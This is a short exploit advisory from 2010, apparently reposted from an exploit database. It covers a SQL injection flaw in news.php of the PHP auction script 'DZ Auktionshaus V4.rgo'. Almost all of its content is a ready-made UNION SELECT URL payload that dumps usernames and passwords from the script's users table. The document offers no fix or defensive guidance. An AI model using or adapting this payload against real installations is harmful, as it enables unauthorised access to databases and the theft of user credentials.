Home / os / winme

DZ Auktionshaus "V4.rgo" (id) news.php SQL Injecti

Posted on 08 March 2010

==================================================================
DZ Auktionshaus "V4.rgo" (id) news.php SQL Injection Vulnerability
==================================================================

----------------------------Information------------------------------------------------
+Name : DZ Auktionshaus "V4.rgo" (id) news.php SQL Injection
+Autor : Easy Laster
+Date   : 08.03.2010
+Script  : DZ Auktionshaus "V4.rgo"
+Price : 99,99 euro
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://server/auktionshaus/index.php?view=read&id=
+Exploitable   : http://server/auktionshaus/news.php?id=null+union+select+1,2,concat
(name,0x3a,password),4,5+from+users#
-----------------------------------------------------------------------------------------


# ~  - [ [ : Inj3ct0r : ] ]

 

TOP